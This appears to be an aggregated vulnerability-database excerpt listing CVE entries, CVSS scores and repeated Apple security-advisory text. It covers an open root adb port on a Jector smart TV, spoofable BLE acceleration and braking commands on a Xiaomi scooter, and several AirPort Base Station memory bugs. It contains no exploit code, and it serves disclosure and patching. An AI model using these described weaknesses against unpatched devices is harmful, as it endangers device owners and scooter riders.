Jector Smart TV FM-K75 devices allow remote code execution because there is an adb open port with root permission. Jector Smart TV FM-K75 devices have vulnerabilities related to authorization, permissions, and access control. Information may be obtained or altered, and a denial-of-service (DoS) condition may result. Jector Smart TV FM-K75 is a smart TV. A security vulnerability exists in the Jector Smart TV FM-K75: the Android Debug Bridge (adb) service is reachable over the network and runs with root privileges. A remote attacker could exploit this vulnerability to execute code.
| VAR-201905-0219 | CVE-2019-12500 | Xiaomi M365 Scooter authorization vulnerability |
CVSS V2: 3.3 CVSS V3: 6.5 Severity: MEDIUM |
The Xiaomi M365 scooter 2019-02-12 before 1.5.1 allows spoofing of "suddenly accelerate" commands. This occurs because Bluetooth Low Energy commands have no server-side authentication check. Other affected commands include suddenly braking, locking, and unlocking. The Xiaomi M365 Scooter contains an authorization vulnerability. Information may be tampered with.
| VAR-202010-0208 | CVE-2019-8581 | Apple AirPort Base Station Buffer Overflow Vulnerability |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
An out-of-bounds read was addressed with improved input validation. This issue is fixed in AirPort Base Station Firmware Update 7.8.1, AirPort Base Station Firmware Update 7.9.1. A remote attacker may be able to leak memory. Apple AirPort Base Station is a wireless router from Apple Inc. of the United States. A buffer overflow vulnerability exists in Apple AirPort Base Stations using firmware prior to 7.9.1. The vulnerability stems from the product not properly validating data boundaries when operating on memory, causing erroneous read and write operations on other associated memory locations. An attacker could exploit the vulnerability to cause a buffer overflow or heap overflow.
Attackers can exploit these issues to execute arbitrary code, bypass security restrictions, gain sensitive information and cause denial-of-service conditions. Apple AirPort Base Station could allow a remote malicious user to obtain sensitive information, caused by an out-of-bounds read error.
AirPort Base Station Firmware
Available for: AirPort Extreme and AirPort Time Capsule base stations
with 802.11ac
Impact: A remote attacker may be able to leak memory
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2019-8581: Lucio Albornoz
AirPort Base Station Firmware
Available for: AirPort Extreme and AirPort Time Capsule base stations
with 802.11ac
Impact: A remote attacker may be able to cause a system denial of
service
Description: A null pointer dereference was addressed with improved
input validation.
CVE-2019-8588: Vince Cali (@0x56)
AirPort Base Station Firmware
Available for: AirPort Extreme and AirPort Time Capsule base stations
with 802.11ac
Impact: A remote attacker may be able to cause a system denial of
service
Description: A denial of service issue was addressed with improved
validation.
CVE-2018-6918: Maxime Villard
AirPort Base Station Firmware
Available for: AirPort Extreme and AirPort Time Capsule base stations
with 802.11ac
Impact: A remote attacker may be able to cause arbitrary code
execution
Description: A use after free issue was addressed with improved
memory management.
CVE-2019-8578: joshua stein
AirPort Base Station Firmware
Available for: AirPort Extreme and AirPort Time Capsule base stations
with 802.11ac
Impact: A base station factory reset may not delete all user
information
Description: The issue was addressed with improved data deletion.
CVE-2019-8575: joshua stein
AirPort Base Station Firmware
Available for: AirPort Extreme and AirPort Time Capsule base stations
with 802.11ac
Impact: An attacker in a privileged position may be able to perform a
denial of service attack
Description: A denial of service issue was addressed with improved
memory handling.
CVE-2019-7291: Maxime Villard
AirPort Base Station Firmware
Available for: AirPort Extreme and AirPort Time Capsule base stations
with 802.11ac
Impact: Source-routed IPv4 packets may be unexpectedly accepted
Description: Source-routed IPv4 packets were disabled by default.
CVE-2019-8580: Maxime Villard
AirPort Base Station Firmware
Available for: AirPort Extreme and AirPort Time Capsule base stations
with 802.11ac
Impact: A remote attacker may be able to cause arbitrary code
execution
Description: A null pointer dereference was addressed with improved
input validation.
CVE-2019-8572: Maxime Villard
Installation note:
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
| VAR-202010-0205 | CVE-2019-8578 | Apple AirPort Base Station resource management error vulnerability |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
A use after free issue was addressed with improved memory management. This issue is fixed in AirPort Base Station Firmware Update 7.8.1, AirPort Base Station Firmware Update 7.9.1. A remote attacker may be able to cause arbitrary code execution.
A resource management error vulnerability exists in Apple AirPort Base Stations using firmware versions prior to 7.9.1. The vulnerability stems from improper management of system resources (such as memory, disk space or files) by the product; in this case it is a use after free. No further details are currently available.
Attackers can exploit these issues to execute arbitrary code, bypass security restrictions, gain sensitive information and cause denial-of-service conditions.
CVE-2019-8581: Lucio Albornoz
AirPort Base Station Firmware
Available for: AirPort Extreme and AirPort Time Capsule base stations with 802.11ac
Impact: A remote attacker may be able to cause a system denial of service
Description: A null pointer dereference was addressed with improved input validation.
CVE-2019-8588: Vince Cali (@0x56)
AirPort Base Station Firmware
Available for: AirPort Extreme and AirPort Time Capsule base stations with 802.11ac
Impact: A remote attacker may be able to cause a system denial of service
Description: A denial of service issue was addressed with improved validation.
CVE-2018-6918: Maxime Villard
AirPort Base Station Firmware
Available for: AirPort Extreme and AirPort Time Capsule base stations with 802.11ac
Impact: A remote attacker may be able to cause arbitrary code execution
Description: A use after free issue was addressed with improved memory management.
CVE-2019-8575: joshua stein
AirPort Base Station Firmware
Available for: AirPort Extreme and AirPort Time Capsule base stations with 802.11ac
Impact: An attacker in a privileged position may be able to perform a denial of service attack
Description: A denial of service issue was addressed with improved memory handling.
CVE-2019-7291: Maxime Villard
AirPort Base Station Firmware
Available for: AirPort Extreme and AirPort Time Capsule base stations with 802.11ac
Impact: Source-routed IPv4 packets may be unexpectedly accepted
Description: Source-routed IPv4 packets were disabled by default.
CVE-2019-8580: Maxime Villard
AirPort Base Station Firmware
Available for: AirPort Extreme and AirPort Time Capsule base stations with 802.11ac
Impact: A remote attacker may be able to cause arbitrary code execution
Description: A null pointer dereference was addressed with improved input validation.
CVE-2019-8572: Maxime Villard
Installation note:
Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/
| VAR-202010-0165 | CVE-2019-8575 | Apple AirPort Base Station has unspecified vulnerabilities |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
The issue was addressed with improved data deletion. This issue is fixed in AirPort Base Station Firmware Update 7.8.1, AirPort Base Station Firmware Update 7.9.1. A base station factory reset may not delete all user information. No further vulnerability details are currently available.
Attackers can exploit these issues to execute arbitrary code, bypass security restrictions, gain sensitive information and cause denial-of-service conditions. An attacker could exploit this vulnerability to gain access to user information.
| VAR-202010-0207 | CVE-2019-8580 | Apple AirPort Base Station Denial of Service Vulnerability (CNVD-2020-65931) |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
Source-routed IPv4 packets were disabled by default. This issue is fixed in AirPort Base Station Firmware Update 7.8.1, AirPort Base Station Firmware Update 7.9.1. Source-routed IPv4 packets may be unexpectedly accepted. An attacker can use this vulnerability to cause a denial of service.
Attackers can exploit these issues to execute arbitrary code, bypass security restrictions, gain sensitive information and cause denial-of-service conditions.